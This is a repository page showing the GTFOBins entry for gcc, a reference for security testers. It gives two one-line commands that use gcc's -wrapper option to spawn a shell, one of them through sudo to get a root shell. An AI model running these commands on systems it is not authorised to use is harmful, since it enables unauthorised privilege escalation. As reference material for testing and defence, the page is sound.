This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
dec4a7f9285e063b2ff711d3cec3636f5d327a45
GTFOBins.github.io
/
_gtfobins
/
gcc.md
bcoles
dec4a7f928
Create gcc.md
2020-03-14 12:20:07 +01:00
359 B
Raw
Blame
History
functions
functions
shell
sudo
code
TF=$(mktemp -d) echo '#!/bin/sh' > $TF/x echo '/bin/sh' >> $TF/x chmod +x $TF/x gcc -wrapper $TF/x $TF/x
code
TF=$(mktemp -d) echo '#!/bin/sh' > $TF/x echo '/bin/sh' >> $TF/x chmod +x $TF/x sudo gcc -wrapper $TF/x $TF/x
Reference in New Issue
View Git Blame
Copy Permalink